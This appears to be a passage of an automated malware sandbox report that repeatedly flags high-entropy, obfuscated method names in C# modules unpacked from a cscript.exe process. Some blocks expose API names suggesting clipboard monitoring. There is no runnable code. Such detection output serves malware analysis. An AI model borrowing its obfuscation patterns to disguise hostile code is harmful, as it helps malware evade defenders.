                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.csHigh entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, GXHRyrck0HnRoIRVg.csHigh entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, 8oKYND99avZqdoU5T.csHigh entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, y9w99ZmeIXuttmqO5.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, ZdLTnuqgOY3k2FQWh.csHigh entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, GVhN53QgxWl6tpiCd.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.csHigh entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.csHigh entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, UAKhR7NJbD3KWn0Nd.csHigh entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, ktUwZuVPUn1uLnrpF.csHigh entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, bRv5O3fSB18gLSRt9.csHigh entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
